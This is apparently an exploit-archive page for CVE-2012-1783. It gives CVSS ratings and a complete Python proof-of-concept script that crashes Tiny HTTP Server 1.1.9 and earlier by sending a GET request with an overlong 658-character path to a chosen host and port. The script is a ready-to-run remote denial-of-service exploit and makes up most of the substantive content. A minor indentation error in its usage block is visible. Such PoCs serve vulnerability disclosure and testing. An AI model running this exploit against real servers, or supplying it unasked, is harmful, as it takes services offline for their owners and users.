Tiny HTTP Server <=v1.1.9 Remote Crash PoC

2012-02-29 / 2012-03-21

Credit: localh0t

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2012-1783

CWE: CWE-20

CVSS Base Score: 7.8/10

Impact Subscore: 6.9/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: None

Integrity impact: None

Availability impact: Complete

#!/usr/bin/python
# Tiny HTTP Server <=v1.1.9 Remote Crash PoC
# written by localh0t
# Date: 24/02/11
# Contact: mattdch0@gmail.com
# Follow: @mattdch
# www.localh0t.com.ar
# Targets: Windows (All)
import httplib,sys
if (len(sys.argv) < 3):
    print "\nTiny HTTP Server <=v1.1.9 Remote Crash PoC"
        print "\n   Usage: %s <host> <port> \n" %(sys.argv[0])
    sys.exit()
payload = "X" * 658
try:
    print "\n[!] Connecting to %s ..." %(sys.argv[1])
    httpServ = httplib.HTTPConnection(sys.argv[1] , int(sys.argv[2]))
    httpServ.connect()
    print "[!] Sending payload..."
    httpServ.request('GET', "/" + str(payload))
    print "[!] Exploit succeed. Check %s if crashed.\n" %(sys.argv[1])
except:
    print "[-] Connection error, exiting..."
httpServ.close()
sys.exit()

References:

http://packetstormsecurity.org/files/110220/tinyhttp-crash.txt

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Tiny HTTP Server <=v1.1.9 Remote Crash PoC

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.